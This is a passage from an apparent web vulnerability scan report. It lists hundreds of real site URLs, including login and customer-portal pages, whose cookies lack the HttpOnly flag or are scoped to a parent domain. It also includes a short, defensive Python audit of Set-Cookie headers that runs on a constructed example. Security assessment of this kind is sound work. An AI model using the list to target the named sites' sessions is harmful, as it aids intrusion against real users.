15.236. http://www.abc.net.au/res/abc/logos/footer_logo.png

15.237. http://www.abc.net.au/res/abc/logos/nav_logo.png

15.238. http://www.abc.net.au/res/abc/styles/bg/divider.png

15.239. http://www.abc.net.au/res/abc/styles/bg/footer.png

15.240. http://www.abc.net.au/res/abc/styles/bg/header.png

15.241. http://www.abc.net.au/res/abc/styles/bg/search.png

15.242. http://www.abc.net.au/res/abc/styles/handheld.css

15.243. http://www.abc.net.au/res/abc/styles/print.css

15.244. http://www.abc.net.au/res/abc/styles/screen.css

15.245. http://www.abc.net.au/res/abc/submenus.htm

15.246. http://www.abc.net.au/res/libraries/abcjs/abc.js

15.247. http://www.abc.net.au/res/libraries/cinerama2/cinerama.swf

15.248. http://www.abc.net.au/res/libraries/cinerama2/cinerama_skin_external.swf

15.249. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2.js

15.250. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2_functions.js

15.251. http://www.abc.net.au/res/libraries/cinerama2/scripts/modernizr-1.6.min.js

15.252. http://www.abc.net.au/res/libraries/jquery/jquery-latest-min.js

15.253. http://www.abc.net.au/res/libraries/stats/webTrends/webtrends.js

15.254. http://www.abc.net.au/res/libraries/swfobject/swfobject-2.2.js

15.255. http://www.abc.net.au/res/sites/7.30/images/730-bg.jpg

15.256. http://www.abc.net.au/res/sites/7.30/images/730-content-bg.jpg

15.257. http://www.abc.net.au/res/sites/7.30/images/730-header.jpg

15.258. http://www.abc.net.au/res/sites/7.30/images/730-nav-bg.jpg

15.259. http://www.abc.net.au/res/sites/7.30/images/730-search-button.jpg

15.260. http://www.abc.net.au/res/sites/7.30/styles/printv5.css

15.261. http://www.abc.net.au/res/sites/7.30/styles/screenv5.css

15.262. http://www.abc.net.au/reslib/201104/r757251_6333237.jpg

15.263. http://www.abc.net.au/reslib/201104/r757251_6333241.jpg

15.264. http://www.bing.com/

15.265. http://www.bing.com/twitter/s/icon_rt.gif

15.266. http://www.facebook.com/home.php

15.267. http://www.flickr.com/badge_code_v2.gne

15.268. http://www.glam.de/

15.269. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

15.270. http://www.orgsites.com/index.html

15.271. http://www.saksfifthavenue.com/main/ProductDetail.jsp

15.272. http://www.shopstyle.com/browse

15.273. http://www.stumbleupon.com/submit

15.274. http://www.webhostingtalk.com/showthread.php

15.275. http://www.wtp101.com/ab_sync

15.276. http://www.youtube.com/api_video_info

15.277. http://www.youtube.com/results

15.278. http://www.youtube.com/watch

15.279. https://www1.gotomeeting.com/register/451586600

15.280. http://www22.glam.com/cTagsImgCmd.act

15.281. http://www35.glam.com/gad/glamadapt_jsrv.act

15.282. http://www35.glam.com/gad/glamadapt_jsrv.act

15.283. http://xads.zedo.com/ads2/c

15.284. http://xads.zedo.com/ads3/a

15.285. http://xml.west.REDACTED.overture.com/d/search/p/REDACTED/xml/en-au/v8/

15.286. http://yads.zedo.com/ads3/a

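Sections 11, 15 and 16 are one passive check applied to Set-Cookie headers: Secure missing on a cookie set over HTTPS, a Domain attribute wider than the responding host, and HttpOnly missing. The audit below is an added example, not the scanner's code and not code from any listed site; it reproduces those three checks over a response URL and Set-Cookie headers that are constructed for the example and name no host from this report.

```python
"""Passive Set-Cookie audit for the three cookie findings in this report:
'SSL cookie without secure flag set', 'Cookie scoped to parent domain' and
'Cookie without HttpOnly flag set'.

Added example; the sample response below is constructed and describes no
host in the report."""
from urllib.parse import urlsplit

SECURE_MISSING = "SSL cookie without secure flag set"
PARENT_DOMAIN = "Cookie scoped to parent domain"
HTTPONLY_MISSING = "Cookie without HttpOnly flag set"


def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, value, attributes).

    Attributes are keyed by lower-cased name; bare flags (Secure, HttpOnly)
    map to True. Values are not unquoted because the audit only needs the
    attribute names and the Domain value."""
    parts = [p.strip() for p in header.split(";")]
    name, sep, value = parts[0].partition("=")
    if not sep or not name.strip():
        raise ValueError("malformed Set-Cookie: %r" % header)
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, sep, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value, attrs


def is_parent_domain(host, domain):
    """True when Domain covers more than the responding host, e.g. host
    'auth.example.com' with Domain '.example.com' (every example.com
    subdomain then receives the cookie)."""
    host = host.lower().rstrip(".")
    domain = domain.lower().lstrip(".").rstrip(".")
    if not domain or host == domain:
        return False
    return host.endswith("." + domain)


def audit_set_cookie(url, set_cookie_headers):
    """Return [(cookie_name, finding), ...] for one response.

    Secure is expected only when the response itself arrived over HTTPS
    (the report's 'SSL cookie' wording); HttpOnly is expected everywhere;
    Domain is flagged when it widens the cookie beyond the responding host."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    findings = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        if parts.scheme == "https" and "secure" not in attrs:
            findings.append((name, SECURE_MISSING))
        domain = attrs.get("domain")
        if isinstance(domain, str) and is_parent_domain(host, domain):
            findings.append((name, PARENT_DOMAIN))
        if "httponly" not in attrs:
            findings.append((name, HTTPONLY_MISSING))
    return findings


# Constructed sample response (not captured from any host in the report).
SAMPLE_URL = "https://auth.example.com/login.jsp"
SAMPLE_HEADERS = [
    "JSESSIONID=3F2A9C; Path=/; Domain=.example.com",
    "pref=en; Path=/; Secure; HttpOnly",
    "tracker=9b1d; Domain=auth.example.com; Secure",
]

if __name__ == "__main__":
    for name, finding in audit_set_cookie(SAMPLE_URL, SAMPLE_HEADERS):
        print("%-10s %s" % (name, finding))
```

On the constructed sample this yields three findings for JSESSIONID (no Secure over HTTPS, Domain=.example.com widens it to every example.com host, no HttpOnly) and one for tracker (no HttpOnly); pref is clean. The audit returns one tuple per cookie per response, which matches how the report above is organised: a cookie set on every page appears once under each URL that set it.
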
16. Cookie without HttpOnly flag set

16.1. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22

16.2. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7

16.3. https://admin.iconnection.com/login.aspx

16.4. http://ads.adxpose.com/ads/ads.js

16.5. http://ads.shopstyle.com/

16.6. https://auth.tek.com/mytek/faces/forgotpassword.jsp

16.7. https://auth.tek.com/mytek/faces/loginregistration.jsp

16.8. https://auth.tek.com/mytek/faces/scripts/forms.js

16.9. https://auth.tek.com/mytek/faces/scripts/jsr_class.js

16.10. https://auth.tek.com/mytek/faces/scripts/sm.js

16.11. https://auth.tek.com/mytek/faces/scripts/webservice.js

16.12. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.13. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.14. https://clientcommunity.touchnet.com/web/

16.15. https://customer.trizetto.com/OnyxCustomerPortal/

16.16. https://customer.trizetto.com/OnyxCustomerPortal/home.asp

16.17. https://customer.trizetto.com/OnyxCustomerPortal/menu.asp

16.18. http://cx.trizetto.com/

16.19. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.20. http://dte.sellpoint.net/spcm/dm

16.21. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

16.22. http://e-sites2.tek.com/mytek/faces/scripts/forms.js

16.23. http://e-sites2.tek.com/mytek/faces/scripts/jsr_class.js

16.24. http://e-sites2.tek.com/mytek/faces/scripts/sm.js

16.25. http://e-sites2.tek.com/mytek/faces/scripts/webservice.js

16.26. http://e-sites2.tek.com/mytek/faces/startresource.jsp

16.27. http://enjmp.com/links/

16.28. http://entertainment.glam.com/

16.29. http://event.adxpose.com/event.flow

16.30. http://glamnewlive.disqus.com/remote_auth.js

16.31. https://idesk.infocrossing.com/

16.32. http://living.glam.com/

16.33. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

16.34. http://support.logrhythm.com/ics/support/default.asp

16.35. https://support.logrhythm.com/ics/default.asp

16.36. https://support.logrhythm.com/ics/support/LeftSplash.asp

16.37. https://support.logrhythm.com/ics/support/default.asp

16.38. https://support.logrhythm.com/ics/support/mylogin.asp

16.39. http://t.mookie1.com/t/v1/imp

16.40. https://tracker.i-structure.com/

16.41. http://vpswebserver.com/

16.42. http://www.glam.com/

16.43. http://www.glam.com/category/uncategorized/

16.44. http://www.glam.com/wp-content/themes/glam_v1/glam-login/login_template.php

16.45. http://www.glam.com/xmlrpc.php

16.46. http://www.glammedia.com/about_glam/our_story/index.php

16.47. http://www.insurancemgr.com/ppc/health.php

16.48. http://www.linkedin.com/cws/share-count

16.49. https://www.medicare-solution.com/mss/home/Index.jsp

16.50. http://www.patlive.com/appointment-scheduling/

16.51. https://www.placemyad.com.au/employment/doSelectReach

16.52. http://www.playtexbramakeover.com/

16.53. http://www.realestate.com.au/

16.54. http://www.sfaxme.com/index.php

16.55. http://www.simplyyours.co.uk/shop/nav/show.action

16.56. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

16.57. http://www.thefashionablegal.com/xmlrpc.php

16.58. http://www.thefashionablehousewife.com/wp-login.php

16.59. http://www.thehousehuntershandbook.com/public/listingSingle.do

16.60. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

16.61. http://www.topcareerschools.com/s/279-390/12823153/

16.62. http://www.topstockanalysts.com/land/tsa/top-12-dssnow.asp

16.63. http://www.touchnet.com/web/display/TN/Home

16.64. http://www.trizetto.com/hpSolutions/hipaa.asp

16.65. http://www.trulia.com/homeroll/MA/Rehoboth/

16.66. http://www.twisted-silver.com/

16.67. http://www.webmgr8.com/index.cfm

16.68. http://www.wildflowerlinens.com/products/table-linen

16.69. http://www.wiseshop.com/shop.php

16.70. https://www1.gotomeeting.com/register/451586600

16.71. http://www2.idexpertscorp.com/contact/

16.72. http://www2.tek.com/cmswpt/evfinder.lotr

16.73. http://www2.tek.com/cmswpt/pidetails.lotr

16.74. http://www2.tek.com/cmswpt/podetails.lotr

16.75. http://www2.tek.com/cmswpt/pofinder.lotr

16.76. http://www2.tek.com/cmswpt/prdetails.lotr

16.77. http://www2.tek.com/cmswpt/prfinder.lotr

16.78. http://www2.tek.com/cmswpt/psdetails.lotr

16.79. http://www2.tek.com/cmswpt/swfinder.lotr

16.80. http://www2.tek.com/cmswpt/tidetails.lotr

16.81. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.82. http://ad.afy11.net/ad

16.83. http://ad.amgdgt.com/ads/

16.84. http://ad.linksynergy.com/fs-bin/show

16.85. http://ad.linksynergy.com/fs-bin/show

16.86. http://ad.turn.com/server/ads.js

16.87. http://ad.turn.com/server/pixel.htm

16.88. http://ad.yabuka.com/statsin/adframe/693/300x250

16.89. http://ad.yabuka.com/statsin/adframe/903/300x250

16.90. http://ad.yieldmanager.com/iframe3

16.91. http://ad.yieldmanager.com/imp

16.92. http://ad.yieldmanager.com/pixel

16.93. http://ad.yieldmanager.com/unpixel

16.94. http://adfarm.mediaplex.com/ad/js/6726-112732-1178-13

16.95. http://admonkey.dapper.net/AdBriteUIDMonster

16.96. http://ads.adbrite.com/adserver/behavioral-data/8201

16.97. http://ads.adbrite.com/adserver/behavioral-data/8204

16.98. http://ads.adbrite.com/adserver/vdi/682865

16.99. http://ads.adbrite.com/adserver/vdi/712156

16.100. http://ads.adbrite.com/adserver/vdi/742697

16.101. http://ads.adbrite.com/adserver/vdi/753292

16.102. http://ads.adbrite.com/adserver/vdi/779045

16.103. http://ads.adbrite.com/adserver/vdi/810647

16.104. http://ads.adbrite.com/adserver/vdi/830697

16.105. http://ads.pointroll.com/PortalServe/

16.106. http://ads.revsci.net/adserver/ako

16.107. http://ads.revsci.net/adserver/ako

16.108. http://ads.revsci.net/adserver/ako

16.109. http://ads.revsci.net/adserver/ako

16.110. http://ads.revsci.net/adserver/ako

16.111. http://ads.revsci.net/adserver/ako

16.112. http://ads.revsci.net/adserver/ako

16.113. http://ads.revsci.net/adserver/ako

16.114. http://ads.revsci.net/adserver/ako

16.115. http://ads.revsci.net/adserver/ako

16.116. http://ads.revsci.net/adserver/ako

16.117. http://ads.revsci.net/adserver/ako

16.118. http://ads.revsci.net/adserver/ako

16.119. http://ads.revsci.net/adserver/ako

16.120. http://ads.revsci.net/adserver/ako

16.121. http://ads.revsci.net/adserver/ako

16.122. http://ads.revsci.net/adserver/ako

16.123. http://ads.revsci.net/adserver/ako

16.124. http://ads.revsci.net/adserver/ako

16.125. http://ads.revsci.net/adserver/ako

16.126. http://ads.revsci.net/adserver/ako

16.127. http://ads.revsci.net/adserver/ako

16.128. http://ads.specificmedia.com/serve/v=5

16.129. http://ads2.adbrite.com/v0/ad

16.130. http://ads2.adbrite.com/v0/ad

16.131. http://adsfac.us/ag.asp

16.132. http://adx.hwtm.com/www/delivery/spc.php

16.133. http://afe.specificclick.net/

16.134. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

16.135. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

16.136. http://altfarm.mediaplex.com/ad/js/17975-126683-12284-1

16.137. http://amch.questionmarket.com/adsc/d724925/17/725047/adscout.php

16.138. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php

16.139. http://amch.questionmarket.com/adsc/d724925/4/725047/adscout.php

16.140. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php

16.141. http://amch.questionmarket.com/adsc/d891575/2/891856/adscout.php

16.142. http://amch.questionmarket.com/adsc/d908201/2/41838359/adscout.php

16.143. http://amch.questionmarket.com/adscgen/st.php

16.144. http://api.twitter.com/1/statuses/user_timeline.json

16.145. http://ar.atwola.com/atd

16.146. http://ar.voicefive.com/b/wc_beacon.pli

16.147. http://ar.voicefive.com/bmx3/broker.pli

16.148. http://arts.onbloglist.com/img12.php

16.149. http://au.myspace.com/

16.150. http://b.scorecardresearch.com/b

16.151. http://b.scorecardresearch.com/p

16.152. http://b.scorecardresearch.com/r

16.153. http://b.voicefive.com/b

16.154. http://b3.mookie1.com/1/TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228@Bottom3

16.155. http://bh.contextweb.com/bh/rtset

16.156. http://bidder.mathtag.com/iframe/notify

16.157. http://bing.com/

16.158. http://bing4.com/

16.159. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.160. http://c.atdmt.com/c.gif

16.161. http://c.REDACTED/c.gif

16.162. http://c.statcounter.com/t.php

16.163. http://c7.zedo.com/bar/v16-405/c5/jsc/gl.js

16.164. http://cm.au.REDACTED.overture.com/js_flat_1_0/

16.165. http://cm.netseer.com/redirect

16.166. http://REDACTED/js_1_0/

16.167. http://csc.beap.ad.yieldmanager.net/i

16.168. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

16.169. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

16.170. http://data.cmcore.com/imp

16.171. http://delb.opt.fimserve.com/adopt/

16.172. http://demr.opt.fimserve.com/adopt/

16.173. http://desb.opt.fimserve.com/adopt/

16.174. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

16.175. http://engine.cmmeglobal.com/v1/request

16.176. http://engine.cmmeglobal.com/v1/visitor-event

16.177. http://ev.ads.pointroll.com/event/

16.178. http://f2network.112.2o7.net/b/ss/f2ntheage/1/H.20.2/s36513519773725

16.179. http://glam.grapeshot.co.uk/main/redirect.cgi

16.180. http://glam.ivwbox.de/2004/01/survey.js

16.181. http://glam.ivwbox.de/blank.gif

16.182. http://glam.ivwbox.de/cgi-bin/ivw/CP/GLA_UK_123456

16.183. http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js

16.184. http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js

16.185. http://hits.guardian.co.uk/b/ss/guardiangu-music,guardiangu-network/1/H.22.1/s33948350739665

16.186. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

16.187. http://i.w55c.net/ping_match.gif

16.188. http://idpix.media6degrees.com/orbserv/hbpix

16.189. http://image2.pubmatic.com/AdServer/Pug

16.190. http://jobs.orbitcast.com/a/jbb/find-jobs-json/jbb_widget_list_jobposts/5

16.191. http://jobs.orbitcast.com/a/jbb/promote-widget-vertical-customizable-css/border-CCCCCC/background-FFFFFF/links-ab0404/company-000000/location-909090/width-170

16.192. http://leadback.advertising.com/adcedge/lb

16.193. http://loadus.exelator.com/load/

16.194. http://log.c12s.com/redir/327090/0/740/1396695815192695/0/643921/53/100004/1.ver

16.195. http://lp.idexpertscorp.com/hitech-whitepapera/

16.196. http://lp.idexpertscorp.com/hitech-whitepapera/IDE-Unbounce-footer-A.original_4v7u278ezbx8it4w.jpg

16.197. http://lp.idexpertscorp.com/hitech-whitepapera/bg-grad-fade-edge-ul.original.png

16.198. http://lp.idexpertscorp.com/hitech-whitepapera/bullet.original.jpg

16.199. http://lp.idexpertscorp.com/hitech-whitepapera/button-down.original.jpg

16.200. http://lp.idexpertscorp.com/hitech-whitepapera/button-up.original.jpg

16.201. http://lp.idexpertscorp.com/hitech-whitepapera/form-bottom-CORRECT.original.jpg

16.202. http://lp.idexpertscorp.com/hitech-whitepapera/form-header.original.jpg

16.203. http://lp.idexpertscorp.com/hitech-whitepapera/page_defaults.css

16.204. http://lp.idexpertscorp.com/hitech-whitepapera/reset.css

16.205. http://lp.idexpertscorp.com/hitech-whitepapera/testimonial-arrow.original.gif

16.206. http://lp.idexpertscorp.com/hitech-whitepapera/top-fade.original.jpg

16.207. http://lp.idexpertscorp.com/hitech-whitepapera/version-1-header.original_4v7ufsth145maha8.jpg

16.208. http://map.media6degrees.com/orbserv/aopix

16.209. http://map.media6degrees.com/orbserv/hbpix

16.210. http://media.adfrontiers.com/pq

16.211. http://media.fastclick.net/w/get.media

16.212. http://media.trafficmp.com/a/js

16.213. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnewsau/ros/728x90/jx/ss/a/1623201161@Top1

16.214. http://nmhiltonhead.112.2o7.net/b/ss/nmhiltonhead/1/H.20.3/s3688769728876

16.215. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

16.216. http://open.ad.yieldmanager.net/a1

16.217. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

16.218. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

16.219. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

16.220. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

16.221. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

16.222. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

16.223. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

16.224. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

16.225. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

16.226. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

16.227. http://optimized-by.rubiconproject.com/a/7968/13027/24102-15.js

16.228. http://optimized-by.rubiconproject.com/a/7968/13027/24103-2.js

16.229. http://origin-tracking.trulia.com/trackingPixel.gif

16.230. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

16.231. http://phoenix.untd.com/TRCK/RGST

16.232. http://pix04.revsci.net/E05516/b3/0/3/0902121/268098805.js

16.233. http://pix04.revsci.net/G08769/b3/0/3/0902121/439307182.js

16.234. http://pix04.revsci.net/G08769/b3/0/3/0902121/448568946.js

16.235. http://pix04.revsci.net/G08769/b3/0/3/0902121/47587256.js

16.236. http://pix04.revsci.net/G08769/b3/0/3/0902121/565634184.js

16.237. http://pix04.revsci.net/G08769/b3/0/3/0902121/702929375.js

16.238. http://pix04.revsci.net/G08769/b3/0/3/0902121/717262760.js

16.239. http://pix04.revsci.net/G08769/b3/0/3/0902121/797060244.js

16.240. http://pix04.revsci.net/G08769/b3/0/3/0902121/973395291.js

16.241. http://pixel.33across.com/ps/

16.242. http://pixel.33across.com/ps/189233/

16.243. http://pixel.33across.com/ps/273884/

16.244. http://pixel.33across.com/ps/332046/

16.245. http://pixel.33across.com/ps/41208/

16.246. http://pixel.33across.com/ps/425905/

16.247. http://pixel.33across.com/ps/500284/

16.248. http://pixel.33across.com/ps/682989/

16.249. http://pixel.invitemedia.com/data_sync

16.250. http://pixel.invitemedia.com/pixel

16.251. http://pixel.quantserve.com/pixel

16.252. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

16.253. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

16.254. http://pixel.quantserve.com/seg/r

16.255. http://pixel.rubiconproject.com/di.php

16.256. http://pixel.rubiconproject.com/tap.php

16.257. http://pixel.rubiconproject.com/tap.php

16.258. http://pixel.rubiconproject.com/tap.php

16.259. http://pixel.rubiconproject.com/tap.php

16.260. http://pixel.rubiconproject.com/tap.php

16.261. http://pixel.rubiconproject.com/tap.php

16.262. http://pixel.rubiconproject.com/tap.php

16.263. http://pt200194.unica.com/ntpagetag.gif

16.264. http://r.openx.net/set

16.265. http://r.turn.com/r/beacon

16.266. http://r1-ads.ace.advertising.com/site=743833/size=300250/u=2/bnum=65003685/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.thesunchronicle.com%252Farticles%252F2011%252F05%252F02%252Frehoboth%252F9166782.txt

16.267. http://r1-ads.ace.advertising.com/site=781800/size=728090/u=2/bnum=78594486/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.islandpacket.com%252F2011%252F05%252F02%252F1640363%252Fwill-killing-osama-kill-the-movement.html

16.268. http://r1-ads.ace.advertising.com/site=795866/size=728090/u=2/bnum=47065580/hr=15/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.righthealth.com%252Ftopic%252FWhat_Is_Hipaa%253Fp%253Dl%2526as%253DREDACTED%2526ac%253D529%2526kgl%253D38620759

16.269. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=54085448/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

16.270. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=28266332/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.dailytelegraph.com.au%252Fnews%252Fbreaking-news%252Ftony-abbott-says-migration-proposals-are-weak%252Fstory-e6freuz0-1226045133021%253Ffrom%253Dpublic_rss

16.271. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=29579703/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theaustralian.com.au%252Fnews%252Fnation%252Fabbott-a-hero-on-troubled-christmas-island%252Fstory-e6frg6nf-1226045245809

16.272. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=65424947/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.news.com.au%252Fbreaking-news%252Fnational%252Fchristmas-island-detainee-sews-lips-together%252Fstory-e6frfku9-1226044502823

16.273. http://rd.apmebf.com/w/get.media

16.274. http://s.xp1.ru4.com/meta

16.275. http://segment-pixel.invitemedia.com/pixel

16.276. http://segment-pixel.invitemedia.com/set_partner_uid

16.277. http://statse.webtrendslive.com/dcspqk1vz000004f6a5zba0ke_3h9t/dcs.gif

16.278. https://support.logrhythm.com/FileManagement/Download/08bdb7021bc34da1829ccb8c216d97ba

16.279. https://support.logrhythm.com/FileManagement/Download/e04c558f41be497b8f6340964105111b

16.280. http://sync.mathtag.com/sync/img

16.281. http://t.invitemedia.com/track_imp

16.282. http://tacoda.at.atwola.com/rtx/r.js

16.283. http://tag.contextweb.com/TagPublish/getad.aspx

16.284. http://tags.bluekai.com/site/2312

16.285. http://tags.bluekai.com/site/2312

16.286. http://tags.bluekai.com/site/2731

16.287. http://tags.bluekai.com/site/2748

16.288. http://tags.bluekai.com/site/3358

16.289. http://tags.bluekai.com/site/3890

16.290. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

16.291. http://tap.rubiconproject.com/oz/feeds/targus/profile

16.292. http://tap.rubiconproject.com/oz/sensor

16.293. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

16.294. http://tracking.quisma.com/v.cfs

16.295. http://trgca.opt.fimserve.com/fp.gif

16.296. http://twitter.com/statuses/user_timeline/fashionablegal.json

16.297. http://video.REDACTED.com/soapboxservice2.aspx

16.298. http://widget.linkwithin.com/get_custom_js

16.299. http://widget2.linkwithin.com/get_custom_js

16.300. http://www.abc.net.au/7.30/content/2011/js/swfobject.js

16.301. http://www.abc.net.au/7.30/content/2011/s3200763.htm

16.302. http://www.abc.net.au/crossdomain.xml

16.303. http://www.abc.net.au/favicon.ico

16.304. http://www.abc.net.au/includes/scripts/global.js

16.305. http://www.abc.net.au/news/assets/v5/images/common/footer-bg.png

16.306. http://www.abc.net.au/news/assets/v5/images/common/programs-footer.png

16.307. http://www.abc.net.au/res/abc/logos/footer_logo.png

16.308. http://www.abc.net.au/res/abc/logos/nav_logo.png

16.309. http://www.abc.net.au/res/abc/styles/bg/divider.png

16.310. http://www.abc.net.au/res/abc/styles/bg/footer.png

16.311. http://www.abc.net.au/res/abc/styles/bg/header.png

16.312. http://www.abc.net.au/res/abc/styles/bg/search.png

16.313. http://www.abc.net.au/res/abc/styles/handheld.css

16.314. http://www.abc.net.au/res/abc/styles/print.css

16.315. http://www.abc.net.au/res/abc/styles/screen.css

16.316. http://www.abc.net.au/res/abc/submenus.htm

16.317. http://www.abc.net.au/res/libraries/abcjs/abc.js

16.318. http://www.abc.net.au/res/libraries/cinerama2/cinerama.swf

16.319. http://www.abc.net.au/res/libraries/cinerama2/cinerama_skin_external.swf

16.320. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2.js

16.321. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2_functions.js

16.322. http://www.abc.net.au/res/libraries/cinerama2/scripts/modernizr-1.6.min.js

16.323. http://www.abc.net.au/res/libraries/jquery/jquery-latest-min.js

16.324. http://www.abc.net.au/res/libraries/stats/webTrends/webtrends.js

16.325. http://www.abc.net.au/res/libraries/swfobject/swfobject-2.2.js

16.326. http://www.abc.net.au/res/sites/7.30/images/730-bg.jpg

16.327. http://www.abc.net.au/res/sites/7.30/images/730-content-bg.jpg

16.328. http://www.abc.net.au/res/sites/7.30/images/730-header.jpg

16.329. http://www.abc.net.au/res/sites/7.30/images/730-nav-bg.jpg

16.330. http://www.abc.net.au/res/sites/7.30/images/730-search-button.jpg

16.331. http://www.abc.net.au/res/sites/7.30/styles/printv5.css

16.332. http://www.abc.net.au/res/sites/7.30/styles/screenv5.css

16.333. http://www.abc.net.au/reslib/201104/r757251_6333237.jpg

16.334. http://www.abc.net.au/reslib/201104/r757251_6333241.jpg

16.335. http://www.bing.com/

16.336. http://www.bing.com/twitter/s/icon_rt.gif

16.337. http://www.blogcatalog.com/images/buttons/blogcatalog5.gif

16.338. http://www.blogged.com/icons/rt_1472907.gif

16.339. http://www.blogged.com/icons/vn_sarahjeanb_1472907.gif

16.340. http://www.facebook.com/home.php

16.341. http://www.flickr.com/badge_code_v2.gne

16.342. http://www.glam.de/

16.343. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

16.344. http://www.hipaastore.com/

16.345. https://www.hipaastore.com/index.php

16.346. http://www.infocrossing.com/

16.347. http://www.nexica.com/error404.aspx

16.348. http://www.orgsites.com/index.html

16.349. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

16.350. http://www.righthealth.com/c-javascripts/kapp_relevance.js

16.351. http://www.righthealth.com/images/adore/adlabel.gif

16.352. http://www.righthealth.com/images/adore/adlabelhoriz.gif

16.353. http://www.righthealth.com/images/adore/hidden.gif

16.354. http://www.righthealth.com/images/adore/kosmix.png

16.355. http://www.righthealth.com/images/blankpixel.png

16.356. http://www.righthealth.com/images/health/HONConduct767461_s.gif

16.357. http://www.righthealth.com/images/health/blog_profiles/steven.png

16.358. http://www.righthealth.com/images/health/dailydose-icon-facebook.png

16.359. http://www.righthealth.com/images/health/dailydose-icon-twitter.png

16.360. http://www.righthealth.com/images/health/dailydose-small.png

16.361. http://www.righthealth.com/images/health/exploresuper/icon_article.png

16.362. http://www.righthealth.com/images/health/exploresuper/icon_forums.png

16.363. http://www.righthealth.com/images/health/exploresuper/icon_news.png

16.364. http://www.righthealth.com/images/health/exploresuper/icon_photo.png

16.365. http://www.righthealth.com/images/health/exploresuper/icon_video.png

16.366. http://www.righthealth.com/images/health/favicon.ico

16.367. http://www.righthealth.com/images/mpv.txt

16.368. http://www.righthealth.com/images/pv.txt

16.369. http://www.righthealth.com/images/sprites/fark-sprite.png

16.370. http://www.righthealth.com/images/sprites/favicon-sprite.png

